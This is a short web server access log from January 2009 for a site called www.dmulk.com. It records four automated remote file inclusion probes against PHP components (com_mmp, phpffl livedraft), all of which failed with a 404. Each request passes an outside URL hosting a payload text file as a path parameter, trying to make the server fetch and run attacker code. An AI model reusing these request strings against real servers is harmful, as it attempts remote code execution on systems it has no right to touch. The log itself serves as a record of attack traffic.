119.235.18.7 - - [06/Jan/2009:09:07:08 -0800] "GET /components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:07:08 -0800] "GET /logs/access_080613.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:07:09 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:07:19 -0800] "GET /logs/access_080613.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
